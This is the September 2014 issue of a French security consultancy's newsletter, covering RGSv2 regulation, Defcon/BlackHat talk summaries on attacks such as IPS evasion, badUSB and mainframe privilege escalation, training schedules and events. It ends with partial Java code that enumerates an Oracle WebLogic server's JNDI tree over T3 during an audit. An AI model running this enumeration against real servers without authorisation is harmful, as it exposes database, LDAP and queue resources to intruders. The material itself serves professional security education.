[Newsletter HSC] N°121 - Septembre 2014

Newsletter d'information de HSC newsletter at hsc-news.com
Mer 3 Sep 10:57:36 CEST 2014


========================================================================
              HSC Newsletter  --  N°121 --  septembre 2014
========================================================================




    Merci à nos 6000 abonnés fidèles : la première Newsletter HSC était
 en septembre 2004, la Newsletter HSC a 10 ans !


     « Ce sont les événements qui commandent aux hommes
       et non les hommes aux événements »

                                        [ Herodote ]





--[ Sommaire ]----------------------------------------------------------

      1. Éditorial - RGSv2
      2. Le saviez-vous ? La question
      3. HSC sponsor de la conférence SecureParis 2014 le 16 octobre
      4. Compte-rendu des conférences Defcon et BlackHat Las Vegas
      5. Offres d'emploi HSC : consultants débutants et séniors
      6. Agenda des interventions publiques
      7. Prochaines formations HSC
      8. Actualité des associations : Club 27001, OSSIR et Clusif
      9. Le saviez-vous ? La réponse



--[ 1. Éditorial - Christophe Renard ]-----------------------------------

    Arrivé avec l'été, le Référentiel Général de Sécurité en version 2 (RGS v2)
 est entré en vigueur le 1er juillet dernier.

 Pour ceux qui ne s'en souviendraient pas, ce texte régit la façon dont la 
 sécurité des télé-services, offerts aux usagers de l'administration ou
 inter-administrations, doit être gérée.
 Le RGS n'est pas seul, il vient s'inscrire dans une démarche de numérisation
 des services publics qui est encadrée pas des référentiels d'interopérabilité
 (RGI), ou d'accessibilité (RGA).
 À eux trois, ces textes définissent un cadre pour la mise en place de
 l'administration électronique : comment elle s'interconnecte, comment elle
 assure l'égalité d'accès des usagers et comment elle garantit la sécurité des
 données qu'elle opère.

 Depuis le RGS v1, le texte a subi un toilettage bienvenu, en particulier sur
 les annexes relatives aux certificats numériques. Il en résulte un texte plus
 compact, plus simple et donc plus accessible.
 Mais cette nouvelle version va plus loin. En effet, le RGS en version 1, très
 concentré sur la cryptographie, permettait de labelliser des fournisseurs de
 services d'horodatage et de services de gestion de certificats numériques.  La
 version 2 officialise une labellisation des prestataires d'audit : les PASSI.

 Cette qualification est la seule, à l'échelle nationale, qui garantisse une
 vérification des capacités des prestataires d'audit SSI sous le contrôle de
 l'Etat français. La reconnaissance de ce label, en l'absence d'alternative,
 est potentiellement d'une portée plus vaste que le périmètre (déjà étendu) de
 l'administration.

 La parution du RGSv2 était initialement attendue fin 2013, puis espérée en
 fin d'année 2014. Sa parution fin juin est donc, pour beaucoup, une surprise.

 Cet été aura vu la sortie d'une série significative de textes qui témoignent
 d'une activité intense au sein des services de l'Etat :
  + 25 juin : RGS v2 ;
  + 28 juillet : appel à commentaires sur le projet de référentiel pour les
       prestataires de traitement d'incidents ;
  + 11 août : appel à commentaires sur le projet de référentiel pour les
       prestataires de "Cloud" sécurisé ;
  + 29 août : PSSI de l'Etat.

 L'effervescence de l'Etat au sujet de la SSI n'est probablement pas terminée.
 Les obligations créées pour les Opérateurs d'Importance Vitale (OIV) par la
 loi de programmation militaire de décembre 2013 (LPM) ne sont en effet pas
 encore précisées par un décret. Ce texte et ses dépendances devraient
 permettre aux opérateurs de déterminer le périmètre des infrastructures
 vitales, et leur indiquer comment en assurer la sécurité en conformité avec la
 LPM. Pour ce faire, il faudra des services de confiance, pour lesquels
 n'existe aujourd'hui de labellisation nationale que dans les domaines des
 certificats numériques (PSCE), de l'horodatage (PSHE), et depuis le RGSv2,
 d'audit SSI (PASSI).

 La publication des deux projets de référentiels de labellisation démontre
 que la démarche devrait être étendue.

 Certains besoins non encore couverts sont évidents : il n'existe pas de
 labellisation de SOC de confiance, ou de prestataire d'audit SSI pour
 informatique industrielle.

 Au regard de ces éléments, on peut apprécier la sortie du RGSv2 comme une
 étape destinée à être complétée de nouvelles labellisations et d'une
 homogénéisation du paysage SSI de l'administration et des opérateurs vitaux.

 La lecture de la PSSI de l'Etat (PSSIE), qui fixe des objectifs pour 2017,
 permet de voir combien la cible visée est ambitieuse. On y retrouve évidemment
 les exigences de bonne hygiène de sécurité informatique déjà présentes dans le
 RGSv1, renforcées par les différents guides publiés depuis par l'ANSSI. Mais
 les objectifs qui y sont formulés vont plus loin : centralisation des accès
 Internet, généralisation de DNSSEC, gestion corrélée et harmonisée des traces,
 segmentation systématique des réseaux...

 Ces ambitions sont louables et le niveau d'exigence proportionnel à la
 dépendance de nos sociétés sur l'informatique. Reste que la division, souvent
 byzantine, des fiefs de l'administration et l'inertie de procédures
 immémoriales seront des obstacles d'autant plus durs à surmonter que la
 situation de disette budgétaire limite les moyens.

     Le changement radical impulsé par ces textes bénéficiera évidemment à
 ceux, comme HSC, qui assistent dans la mise en place de la sécurité de
 l'information. Mais c'est avant tout un enjeu majeur pour chaque citoyen, dans
 la vie duquel la place du numérique prend une dimension croissante alors même
 que la confiance qu'on lui accorde décroît.


 Références :
   RGS - http://www.ssi.gouv.fr/fr/reglementation-ssi/referentiel-general-de-securite/
   PSSIE - http://circulaire.legifrance.gouv.fr/index.php?action=afficherCirculaire&hit=1&retourAccueil=1&r=38641
   PSCo - http://www.ssi.gouv.fr/fr/certification-qualification/qualification-d-un-prestataire-de-service-de-confiance/referentiels-techniques-de-qualification-des-psco.html
   Appel à commentaires sur le référentiel PRIS - http://www.ssi.gouv.fr/fr/menu/actualites/appel-commentaires-referentiel-d-exigences-applicables-pris.html
   Appel à commentaires sur le référentiel d'informatique dans les nuages - http://www.ssi.gouv.fr/fr/menu/actualites/appel-commentaires-referentiel-d-exigences-informatique-nuage.html
   LPM / Cybermenaces - http://legifrance.gouv.fr/affichTexte.do?cidTexte=JORFTEXT000028338825&categorieLien=id#JORFSCTA000028338829
   SGMAP - http://www.modernisation.gouv.fr/le-sgmap



--[ 2. Le saviez-vous ? La question ]-----------------------------------

    Vous auditez la sécurité d'un site déployé sur serveur d'application Oracle
 Weblogic avec les règles de sécurité par défaut. Vous observez que l'accès à
 la console d'administration est interdit au travers de l'interface Web, mais
 qu'il est possible de s'y connecter avec le protocole T3. Cependant, celle-ci
 est protégée par un nom d'utilisateur et mot de passe, et la politique par
 défaut bloque automatiquement les comptes après un certain nombre d'essais
 infructueux.

 Que pouvons-nous faire ?

     Réponse au paragraphe 9.



--[ 3. HSC sponsor de la conférence SecureParis 2014 le 16 octobre ]-----

    Venez rencontrer HSC lors de la conférence annuelle SecureParis
 organisée par ISC(2) à Paris au MEDEF IDF, 10 rue du Débarcadère,
 75017 Paris, métro/RER Porte Maillot.
 François Martinelli pour les formations, et Jean-Jacques Cayet pour les
 prestations, seront à votre disposition.
 Hervé Schauer animera la table-ronde des experts lors de la conférence.

     Participation gratuite pour les titulaires du CISSP, 99 euros pour les
 autres, programme et inscription en ligne :
 https://www.isc2.org/EventDetails.aspx?id=11941



--[ 4. Compte-rendu des conférences Defcon et BlackHat Las Vegas ]-------
    Par Steeve Barbeau et Inês Ribeiro

 Evasion of high end IPS devices in the age of IPv6
 ==================================================
 Antonio Atlasis et Enno Rey

     Cette conférence parle de l'évasion des IPS en utilisant les en-têtes
 d'extension d'IPv6 et la fragmentation.
 Les en-têtes d'extension sont des options d'IPv6 sous forme de liste chaînée,
 le champ "next header" indiquant dans chaque en-tête la nature de l'en-tête
 suivant. Lors d'une fragmentation, un en-tête "fragment" est ajouté au début
 de chaque fragment après les en-têtes non fragmentables et son champ
 "next header" indique le type du premier en-tête fragmentable du paquet IPv6.
 Cette valeur "next header" est donc théoriquement identique sur tous les
 fragments du paquet, cependant il n'est pas bloquant qu'elle ne le soit pas,
 seul le premier fragment étant utilisé pour récupérer sa valeur. Il est alors
 possible de tromper un IPS en choisissant une autre valeur de "next header"
 pour les fragments suivant le premier, ce qui ne nuira pas au réassemblage du
 paquet mais induira en erreur les parseurs de paquets sur le contenu du
 fragment. Il est aussi possible d'outrepasser certains contrôles en
 réémettant le même fragment avec des "next headers" différents. L'utilisation
 d'autres en-têtes que "fragment" pour la fragmentation permet également
 d'outrepasser certains IPS, tout comme l'ajout de l'en-tête "fragment" sur
 des paquets non fragmentés.


 Attacking mobile broadband modems
 =================================
 Andreas Lindh

     Cette conférence présente diverses attaques Web sur certains modems USB
 ZTE et Huawei.
 Ces modems USB présentent une interface Web proposant diverses fonctionnalités
 dont les appels ne sont pas protégés contre les CSRF. Une requête permet, par
 exemple, d'ajouter un nouveau profil de connexion, dont certains paramètres
 cachés permettent de préciser le serveur DNS statique, permettant des attaques
 de DNS poisoning. De même, l'envoi de SMS n'est pas protégé contre les CSRF,
 permettant l'envoi vers des numéros surtaxés. Des injections XSS sont
 également présentes dans les fichiers de configuration, permettant d'autre
 part d'assurer la persistance de l'attaquant, ces fichiers de configuration
 étant appelés pour générer la page d'accueil internet lors d'une connexion par
 le modem.
 L'auteur a ensuite fait une démonstration d'utilisation de ces vulnérabilités
 pour rediriger l'utilisateur vers un faux réseau social et s'envoyer par SMS
 le login et mot de passe rentrés par celui-ci sur l'interface.


 Android FakeID vulnerability walktrough
 =======================================
 Jeff Forristal

     Cette conférence présente l'exploitation du bogue 13678484 Android
 exploitant une erreur dans la vérification des chaînes de confiance de
 certificats.
 Le processus de signature et de confiance pour Android accepte le même modèle
 chaîné que HTTPS/SSL. Cependant dans l'installeur de paquet Android, la
 vérification de la chaîne est incomplète. En effet, l'installeur vérifie pour
 chaque élément de la chaîne le nom de l'autorité signataire ("issuer") afin de
 rajouter cet élément à la chaîne, mais il n'est pas vérifié si la clef
 publique de ce certificat est effectivement signée par l'"issuer". D'autre
 part, il suffit qu'un élément de la chaîne soit de confiance pour considérer
 l'application de confiance. Il suffit donc de créer un certificat annonçant un
 "issuer" légitime et d'ajouter le certificat de cet "issuer" dans
 l'application pour être considéré comme une application de confiance sous
 l'égide de cet "issuer". Ces signatures ont de plus un rôle important car
 elles permettent de donner certains droits, par exemple de mise à jour
 d'application ou de fonctionnalités privilégiées. L'auteur donne l'exemple de
 certificats d'Adobe qui donnent le droit à une application d'agir comme un
 plug-in webdev pour toutes les autres applications. L'application ainsi créée
 n'a de plus pas besoin de demander de droits à l'utilisateur puisqu'ils lui
 sont fournis par les certificats.


 Finding and Exploiting Access Control Vulnerabilities in Graphical User
 =======================================================================
 Interfaces
 ==========
 Collin Mulliner

     Cette conférence présente un nouveau type de vulnérabilités, les GEMs,
 présentes lorsque certaines applications appuient leur cloisonnement sur les
 widgets graphiques, ainsi qu'un outil pour trouver ces vulnérabilités. Les
 widgets sont les éléments qui composent graphiquement l'application, comme les
 boutons ou menus, et possèdent divers attributs indiquant leur statut
 (désactivé, caché, lecture seule). Si les contrôles d'accès d'une application
 sont basés uniquement sur ces attributs, il est alors possible de les modifier
 directement pour outrepasser les limitations de l'application. Les GEMs
 possibles sont soit la découverte d'informations, soit la modification
 d'informations, soit l'appel arbitraire à la fonction de callback associée à
 un widget. L'outil GEMminer présenté prend plusieurs comptes à privilèges
 différents et recherche dans l'application testée les widgets possédant des
 valeurs différentes pour ces deux comptes. Il teste ensuite s'il est possible
 de changer ce widget chez l'utilisateur non privilégié afin d'obtenir les
 accès initialement restreints. Les GEMs non vérifiables sont soumises à
 l'auditeur pour tests manuels.


 badUSB - On Accessories that Turn Evil
 ======================================
 Karsten Nohl et Jakob Lell

     Cette conférence présente la reprogrammation d'un "firmware" USB afin de
 le présenter comme un clavier et réaliser des actions à l'insu de
 l'utilisateur.
 Les périphériques USB contiennent un microcontrôleur inaccessible à
 l'utilisateur qui sert à indiquer à l'ordinateur la nature du périphérique.
 Les auteurs ont donc fait de la rétro ingénierie sur un firmware de clef USB
 afin de le modifier et de prétendre que la clef USB est un clavier, puis
 d'exécuter diverses actions pour véroler l'ordinateur. Ils présentent ensuite
 plusieurs scénarios d'attaque, par exemple sous Linux où ils rechargent
 l'économiseur d'écran avec une bibliothèque en LD_PRELOAD qui vole le mot de
 passe, en comptant sur le fait que l'utilisateur est sudoer.


 When the Lights Go Out: Hacking Cisco EnergyWise
 ================================================
 Matthias Luft et Ayhan Soner Koca

     Cette conférence présente le protocole EnergyWise et les vulnérabilités
 que les auteurs ont découvertes en l'étudiant.
 Le protocole EnergyWise est un protocole Cisco en clair permettant de
 récupérer des données de contrôle énergétique et d'émettre des commandes vers
 les appareils compatibles. Les éléments du domaine EnergyWise authentifient
 leurs requêtes grâce à un secret partagé entre tous les membres, avec
 éventuellement un timestamp dans le calcul du HMAC, selon la configuration.
 Lorsque le protocole utilisé est UDP, aucun identifiant unique n'est présent
 dans le paquet, il est donc possible de rejouer les paquets précédemment
 interceptés pour effectuer les mêmes actions. L'algorithme de calcul du HMAC
 authentifiant à partir de la clef est également connu et peut être bruteforcé.
 Une fois la clef obtenue, il est possible de changer le niveau de priorité ou
 d'éteindre/allumer un équipement. L'utilisation du mode avec timestamp permet
 d'éviter le rejeu et de compliquer la force brute.


 Capstone: Next Generation Disassembly Framework
 ===============================================
 Quynh Nguyen Anh

     Cette conférence non technique présentait les raisons pour lesquelles
 l'auteur a décidé de développer l'outil Capstone et sous quelles contraintes.


 GRR: Find All the Badness, Collect All the Things
 =================================================
 Greg Castle

     Cette conférence présente l'outil GRR, qui a pour but d'être une base
 d'artefacts inforensique communautaire. L'objectif est de réunir ces artefacts
 de façon lisible et simple du type "cette information se trouve à cet
 endroit". L'outil gère aussi le remplacement des noms variables, par exemple
 du répertoire d'installation pour générer un chemin complet correct.


 Oracle Data Redaction is Broken
 ===============================
 David Litchfield

     Expert de la sécurité des bases de données Oracle, David Litchfield a
 présenté les vulnérabilités qu'il a identifiées dans une nouvelle
 fonctionnalité d'Oracle nommée "Data redaction" permettant de cacher des
 données sensibles à la volée (dans le retour de la requête plutôt que dans le
 contenu de la table) par des "*" par exemple. Cependant, le conférencier a
 trouvé plusieurs méthodes pour outrepasser cette fonctionnalité : utilisation
 de "RETURNING INTO", xmlquery() et identification de chaque caractère par
 force brute dans le WHERE d'une requête SELECT. Les différentes méthodes pour
 outrepasser cette fonctionnalité sont détaillées dans son papier. À noter
 qu'Oracle a corrigé ces vulnérabilités en juillet, pensez donc à appliquer le
 correctif.

 Papier : http://www.davidlitchfield.com/Oracle_Data_Redaction_is_Broken.pdf


 From root to SPECIAL: Pwning IBM Mainframes
 ===========================================
 Philip Young

     Spécialiste de la sécurité des Mainframes, Philip a présenté différentes
 vulnérabilités typiques de ce type de système. Concernant SSL, moins de la
 moitié des Mainframes l'utilisent et seulement un tiers avec des certificats
 valides. Il a ensuite montré des injections de commandes sur l'interface Web
 /cgi-bin/tsocmd ainsi que l'utilisation de scripts JCL via FTP pour ensuite
 exécuter des commandes. Il a ensuite passé en revue quelques techniques
 d'élévation de privilèges : CVE-2012-5951, attaque par force brute des mots de
 passe présents dans la base RACF, le privilège BPX.SUPERUSER permettant
 d'utiliser "su" en étant root sans entrer de mot de passe.

 Transparents :
 https://www.defcon.org/images/defcon-22/dc-22-presentations/Young/DEFCON-22-Philip-Young-From-root-to-SPECIAL-Hacking-IBM-Mainframes-Updated.pdf
 Outils : http://soldieroffortran.org/dc22.html

 Bypass firewalls, application white lists, secure remote desktops under 20
 ==========================================================================
 seconds
 =======
 Zoltán Balázs

     Après avoir rencontré lors de l'une de ses missions un serveur uniquement
 accessible via RDP (protégé par un pare-feu physique), disposant d'une
 restriction des applications exécutables (AppLocker), d'une authentification
 double facteurs et non accessible depuis le réseau où se situe l'intervenant,
 ce dernier s'est posé la question de comment peut-on atteindre cette cible.
 Disposant d'un accès sur un poste de travail pouvant accéder au serveur, il a
 créé un outil permettant d'exécuter des actions sur le serveur RDP lorsque
 l'utilisateur s'y connecte. L'outil simule des actions utilisateur (clavier,
 souris) pour lancer Word, créer une Macro qui se chargera d'exécuter la charge
 utile, shellcode ou DLL, afin d'outrepasser Applocker. L'outil est semblable à
 la clef USB Rubber Ducky.  La seconde partie de sa présentation concernait la
 mise en place d'un canal de communication persistant via le pare-feu
 autorisant seulement le port 3389. Il a pour cela développé un pilote
 permettant de rediriger les paquets disposant d'un port source spécifique (et
 du port destination 3389), vers le port d'écoute du shell.

 Une alternative aux outils présentés par l'intervenant est rdp2tcp développé
 par Nicolas Collignon [1].

 Transparents :
 http://www.slideshare.net/bz98/defcon-22-bypass-firewalls-application-white-lists-secure-remote-desktops-in-20-seconds
 Outils : https://github.com/MRGEffitas/Write-into-screen et
 https://github.com/MRGEffitas/hwfwbypass
 [1] http://rdp2tcp.sourceforge.net/


 Hack All The Things: 20 Devices in 45 Minutes
 =============================================
 CJ Heres, Amir Etemadieh, Mike Baker et Hans Nielsen

     Les intervenants ont présenté leurs recherches sur 22 équipements
 connectés : imprimantes, ampoules, NAS, système multimédia, réfrigérateur,
 smart TV, lecteur Bluray ou caméra. Ils ont ainsi pu obtenir un accès root sur
 chacun de ces équipements avec une ou plusieurs des méthodes suivantes : UART
 (universal asynchronous receiver/transmitter) via des ports de débogage sur le
 circuit électronique permettant d'interagir avec le système embarqué, eMMC
 (Embedded Multi-Media Card) en apportant des modifications au système de
 fichiers et via l'injection de commandes la plupart du temps au niveau
 d'interfaces web.  Cette présentation animée a été clôturée par une
 intervention musicale de Dual Core [1].

 Transparents :
 http://download.gtvhacker.com/file/generic/GTVHacker-DEFCON22.pdf
 [1] https://www.youtube.com/watch?v=FoUWHfh733Y


 Abusing Software Defined Networks
 =================================
 Gregory Pickett

     Les SDN (Software Defined Networks) sont une nouvelle approche dans la
 gestion des réseaux où le contrôle et les données sont séparés. Ainsi les
 décisions de routage seront prises par le contrôleur et les
 commutateurs/routeurs se chargeront simplement de transmettre les paquets.
 Ainsi en prenant comme exemple le protocole Openflow, lorsque un commutateur
 reçoit un paquet, il regarde dans sa table pour savoir quelle action réaliser,
 en cas d'absence d'information, il demande au contrôleur puis met à jour sa
 table de flux.  Après avoir introduit le sujet, Gregory a commencé à détailler
 les problèmes de ce nouveau type de protocole : chiffrement et
 authentification des communications non obligatoires (et supporté par
 seulement la moitié des implémentations libres et propriétaires), peu
 résilient face à des attaques de déni de service.  Les implémentations
 souffrent également de problèmes de sécurité classiques : absence de
 chiffrement/authentification des accès API via HTTP et mots de passe par
 défaut faibles par exemple. Suite à la conférence, des outils ont été publiés
 afin d'identifier les équipements Openflow et modifier les flux réseau.

 Outils : http://sourceforge.net/projects/sdn-toolkit/files/


 A survey of remote automotive attack surfaces
 =============================================
 Charlie Miller et Christopher Valasek

     Depuis quelques années, les voitures sont de plus en plus intelligentes
 (aides à la conduite) et de plus en plus connectées (réseau WiFi, accès Google
 Maps, navigateur Internet, etc.). Ces dernières contiennent des ECUs
 (Electronic Control Unit) permettant de mesurer et contrôler les éléments de
 la voiture (ABS, détection d'obstacle, etc.). Certains de ces ECUs étant
 sensibles pour la sécurité des passagers, Charlie et Christopher se sont
 intéressés aux réseaux présents dans les voitures et à l'impact que pourrait
 avoir une attaque réalisée à distance. Ils ont ainsi comparé la topologie
 réseau de 20 véhicules de différentes marques, différents modèles et de
 différentes années et ont pu observer une augmentation du nombre de ECUs au
 fur à mesure des années, de la surface d'attaque ainsi que du nombre de
 réseaux embarqués.  Ils ont terminé leur présentation en montrant comment
 "jailbreaker" sa Jeep en utilisant deux méthodes : insérer une clef USB avec
 une image légitime (signée) puis après vérification de l'intégrité insérer une
 autre clef avec une image modifiée, et modifier un script Lua afin d'empêcher
 le contrôle d'intégrité de l'image.

 Papier :
 http://www.slideshare.net/LudovicP/miller-valaceksurveyofremoteattacksurfaces


 L'an prochain Defcon n'aura plus lieu au Rio, mais au Bally's et au Paris ce
 qui représentera une surface presque deux fois plus grande que l'actuelle.



--[ 5. Offres d'emploi HSC pour consultants en sécurité & continuité ]---

     HSC recherche des consultants brillants, débutants ou expérimentés,
 avides de partager et de s'épanouir dans une équipe indépendante,
 pluri-disciplinaire, qui couvre tous les aspects liés à la sécurité et
 continuité, des tests d'intrusion à l'expertise judiciaire, de la
 rétroingénierie à la gouvernance, des systèmes industriels et embarqués à
 la gestion des risques, des technologies sans-fil à la résilience, de
 l'inforensique à l'ingénierie sociale, etc, pour des missions d'expertise
 variées et haut-de-gamme.

     Les ingénieurs sélectionnés pourront être formés à la sécurité par HSC
 (intrusion, inforensique, Windows, SCADA, ISO27001, ISO22301, ISO27005,
 EBIOS, etc.), soit 2 à 6 semaines de formations suivies dans le cadre de
 la prise de fonction.

     HSC recherche également des stagiaires pour des stages de pré-embauche.

     Tous les postes sont basés à Levallois-Perret (Paris), à 5 minutes de la
 gare Saint-Lazare. Les locaux sont spacieux et climatisés (735 m2), avec
 réfectoire et espace détente. Si vous souhaitez proposer votre candidature,
 nous vous remercions d'envoyer votre CV en texte ASCII (pas de .doc ni .docx)
 par courrier électronique à cv at hsc.fr.



--[ 6. Agenda des interventions publiques ]------------------------------

 - 9 septembre 2014 - Réunion de l'OSSIR - Paris
   "Compte-rendu des conférences BlackHat/DEFCON" par Steeve Barbeau
   et Inês Ribeiro
   http://www.ossir.org/paris/calendrier/index.shtml

 - 16 septembre 2014 - Journée d'information SNITEM "E-santé et DM" - Paris
   "Enjeu de la sécurité informatique" - Hervé Schauer
   http://www.snitem.fr/

 - 16 octobre 2014 - Conférence SecureParis - Paris
   Animation de la table-ronde par Hervé Schauer
   https://www.isc2.org/EventDetails.aspx?id=11941

 - 6 novembre 2014 - AppSec Forum 2014 - Yverdon (Suisse)
   "De la sécurité IT à la Cyberdéfense" - Keynote invitée - Hervé Schauer
   http://2014.appsec-forum.ch/

 Retrouvez l'agenda de nos interventions publiques sur
 http://www.hsc.fr/conferences/agenda.html.fr



--[ 7. Prochaines formations HSC ]---------------------------------------

     Nos prochaines formations sont les suivantes :

 - Paris
        ISO 27005 Risk Manager    ..............    : 8 au 10 septembre (#)
        Gestion de crise IT/SSI    .............    : 12 septembre
        Inforensique Windows (SANS FOR408/GIAC GCFE): 15 au 19 septemb(*)(#)(C)
        ISO 27001 Lead Auditor    ..............    : 15 au 19 septembre (#)
        Essentiel de PCI-DSS    ................    : 22 septembre
        Protéger les applis web (DEV522 /GIAC GWEB) : 22 au 26 septembre (*)(#)
        ISO 27001 Lead Implementer    ..........    : 22 au 26 septembre (#)
        Correspondant Informatique et Libertés      : 24 au 26 septembre (@)
        Essentiels techniques de la SSI    .....    : 29 et 30 septembre
        ISO 22301 Lead Implementer    ..........    : 29 sept au 3 octobre (#)
        Essentiels de l'ISO27001:2013    .......    : 6 octobre
        Formation RSSI    ......................    : 6 au 10 octobre
        Essentiels juridiques pour gérer la SSI     : 13 et 14 octobre
        Formation CISSP    .....................    : 13 au 17 octobre (#)
        Tests d'intrusion avancés, exploits,
        hacking éthique (SANS SEC560 / GIAC GPEN)   : 13 au 17 octobre(*)(#)(C)
        ISO 27005 Risk Manager    ..............    : 20 au 22 octobre (#)
        ISO 27001 Lead Auditor    ..............    : 20 au 25 octobre (#)
        Fondamentaux & principes de la SSI
        (SANS SEC401/GIAC GSEC)   ..............    : 20 au 25 octobre (*)(#)
        Mesures de sécurité ISO 27002:2013   ...    : 23 au 24 octobre
        Sécurité du Cloud Computing    .........    : 27-29 octobre
        RGS : la SSI pour le secteur public    .    : 30 octobre
        ISO 22301 Lead Auditor    ..............    : 3 au 7 novembre (#)
        Rétroingénierie de logiciels malfaisants
        Analyse Inforensique avancée et réponse aux
        incidents (SANS FOR508 / GIAC GCFA)    .    : 3 au 7 novembre (*)(#)
        Essentiels Informatique et Liberté   ...    : 12 novembre
        EBIOS Risk Manager    ..................    : 12 au 14 novembre (#)
        ISO 27005 Risk Manager    ..............    : 12 au 14 novembre (#)
        Sécurité SCADA  ........................    : 13 at 14 novembre (*)
        Tests d'intrusion des applications web et
        hacking éthique (SANS SEC542 / GIAC GWAPT)  : 17 au 21 novembre (*)(#)
        ISO 27001 Lead Implementer    ..........    : 17 au 21 novembre (#)
        ISO 27005 Risk Manager    ..............    : 24 au 26 novembre (#)
        Outils et techniques d'analyse
        (SANS FOR610/GIAC GREM)   ..............    : 24 au 28 novembre (*)
        Formation DNSSEC   .....................    : 27 et 28 novembre (*)
        ISO 27001 Lead Auditor    ..............    : 1 au 5 décembre (#)
        Correspondant Informatique et Libertés      : 3 au 5 décembre (@)
        Tests d'intrusion avancés, exploitation de
        failles et hacking éthique (SEC660/GXPN)    : 1 au 6 décembre (*)(#)
        Essentiels de l'ISO27001:2013    .......    : 8 décembre
        Expert Sécurité Linux    ...............    : 8 au 12 décembre (*)(#)
        Indicateurs & tableaux de bord SSI/ISO27004 : 11 décembre
        Gestion des incidents de sécurité/ISO27035  : 12 décembre
        Essentiels juridiques pour gérer la SSI     : 12 et 13 décembre
        Risk Manager Avancé    .................    : 18 et 19 décembre
        Sécurité du WiFi    ....................    : mars 2015  (*)
        Techniques de hacking, exploitation de failles
        et gestion des incidents (SEC504/GCIH)      : avril 2015 (*)(#)
        PKI : principes et mise en oeuvre    ...    : mai 2015 (*)
        Inforensique ordiphones/tablettes (FOR585)  : 1er semestre 2015 (*)(#)
        Sécuriser Windows (SANS SEC505/GIAC GCWN)   : 1er semestre 2015 (*)(#)
        Inforensique réseau avancé (SANS FOR572)   : 1er semestre 2015 (*)
        Tests d'intrusion avancés des applications
        web et hacking éthique (SANS SEC642)  ...   : 2eme semestre 2014 (*)
        Essentiels de l'ISO22301    ............    : 11 septembre


 (*) : formations avec travaux pratiques, avec un ordinateur par stagiaire
 (#) : formations certifiantes par LSTI, ISC2, GIAC ou LPI
 (@) : formation labellisée par la CNIL (www.cnil.fr)
 (C) : session de formation complète

 - Luxembourg
        ISO 27001 Lead Implementer    ..........    : 29 sept au 4 octobre (#)
        ISO 27005 Risk Manager    ..............    : 8 au 10 octobre (#)
        ISO 22301 Lead Implementer    ..........    : 27 au 31 octobre (#)
        Formation CISSP    .....................    : 18 au 22 mai 2015 (#)

 - Lyon
        Essentiels juridiques pour gérer la SSI     : 28 au 29 novembre
        Correspondant Informatique et Libertés      : 4 au 6 mai 2015 (@)

 - Marseille
        Essentiels juridiques pour gérer la SSI     : 15 au 16 septembre
        Correspondant Informatique et Libertés      : 19 au 21 novembre (@)

 - Rennes
        Essentiels de l'ISO27001:2013    .......    : 4 novembre
        Essentiels juridiques pour gérer la SSI     : 12 et 13 décembre
        Correspondant Informatique et Libertés      : mai 2015 (@)

 - Toulouse
        Correspondant Informatique et Libertés .    : 1 au 3 octobre (@)
        Essentiels de l'ISO27001:2013    .......    : 17 octobre
        ISO 27005 Risk Manager    ..............    : 19 au 21 novembre (#)
        ISO 27001 Lead Implementer    ..........    : 12 au 16 octobre 2015 (#)

 (#) : formations certifiantes
 (@) : formation labellisée par la CNIL (www.cnil.fr)

 HSC est certifiée OPQF (http://www.opqf.com/) et ISO9001 par Intertek sur
 ses formations.

 Pour tout renseignement ou inscription, contactez François Martinelli
 (remplaçant de Lynda Benchikh qui est en congé maternité du 1er juillet
 jusqu'au 29 octobre 2014) : formations at hsc.fr -- +33 141 409 704

 Retrouvez le détail de nos formations (plan pédagogique, agenda) ainsi que
 notre catalogue 2014 en PDF sur http://www.hsc-formation.fr/



--[ 8. Actualité des associations : Club 27001, OSSIR et Clusif ]---------

  o Club 27001 (http://www.club-27001.fr/)
     . Prochaine réunion à Paris le jeudi 25 septembre
         - "La série des guides ISO 27034" par Sébastien Gioria (Advens)
         - seconde présentation en cours de confirmation
     . Réunion suivante à Paris jeudi 27 novembre
     . Prochaine réunion à Toulouse en fin d'année
     . Autres prochaines réunions annoncées sur
       www.club-27001.fr et dans les listes électroniques. Inscrivez-vous
       sur les listes de chaque ville sur www.club-27001.fr pour suivre
       l'activité du Club 27001 en région.

 o OSSIR (http://www.ossir.org/)
     . Prochaine réunion à Paris le mardi 9 septembre chez Solucom La Défense
         - Compte-rendu des conférences BlackHat/DEFCON par Steeve Barbeau
           et Inês Ribeiro (Hervé Schauer Consultants)
         - Retour d'expérience de la solution CybelAngel par Eric Vautier
          (Aéroport de Paris)
         - IRMA : Incident Response & Malware Analysis par Bruno Dorsemaine
           (Orange)
         - Revue de vulnérabilités
     . Prochain AfterWorks OSSIR à Paris le mardi 23 septembre à la Kolok
         Réservé aux membres OSSIR, chaque membre peut inviter un non-membre
     . Réunion suivante à Paris le mardi 14 octobre
         - "Présentation du référentiel de réponse à incident de sécurité"
           par Yann Tourdot (ANSSI)
         - "Vulnerability assessment in cryptographic interfaces" par
           Graham Steel
         - Revue de vulnérabilités
     . Prochaine réunion à Toulouse mardi 21 octobre à l'Université Tls-1
         - Certifications sécuritaires sur le domaine bancaire" par
           Nathalie Feyt (CESTI Thalès)
         - "Analyse de sécurité des BOX ADSL" par Yann Bachy (LAAS/CNRS)
     . Réunion suivante à Toulouse mardi 16 décembre 2014
         - "Développement de moyens matériels pour la protection des couches
            basses du logiciel" par Benoît Morgan (LAAS/CNRS)
     . Prochaine réunion à Rennes non planifiée.

 o Clusif (http://www.clusif.fr/)
     . Prochaine conférence mardi 14 octobre à 16h00 à la CCI Paris
       http://www.clusif.fr/



--[ 9. Le saviez-vous ? La réponse ]-------------------------------------

     Dans la configuration par défaut d'un domaine Oracle Weblogic, l'accès à
 l'espace d'administration est protégé que ce soit en passant par le protocole
 T3 ou au travers des interfaces web, empêchant ainsi un utilisateur d'accéder
 à certaines ressources. Malgré tout, il est important de noter que tous les
 éléments configurés sur un serveur (accès aux bases de données, serveur LDAP,
 queues JMS) sont présents sous forme d'objets dans l'arbre JNDI permettant aux
 applications installées sur le serveur d'interagir avec ces ressources. Or
 dans une configuration par défaut, l'ensemble des objets présents dans cet
 arbre sont accessibles pour toute personne pouvant réaliser une connexion
 directe au serveur.

 Dans un premier temps, nous parcourons le contenu de l'arbre grâce au code
 suivant :

  public static void main(String[] args) throws Exception{
    Hashtable<String, String> h = new Hashtable<String, String>();
    Console shell = System.console();
    String sql_query;
    String init_ctx = "weblogic.jndi.WLInitialContextFactory";
    h.put(Context.INITIAL_CONTEXT_FACTORY, init_ctx);
    h.put(Context.PROVIDER_URL, "t3://"+args[0]+":"+args[1]);
    InitialContext ctx = new InitialContext(h);
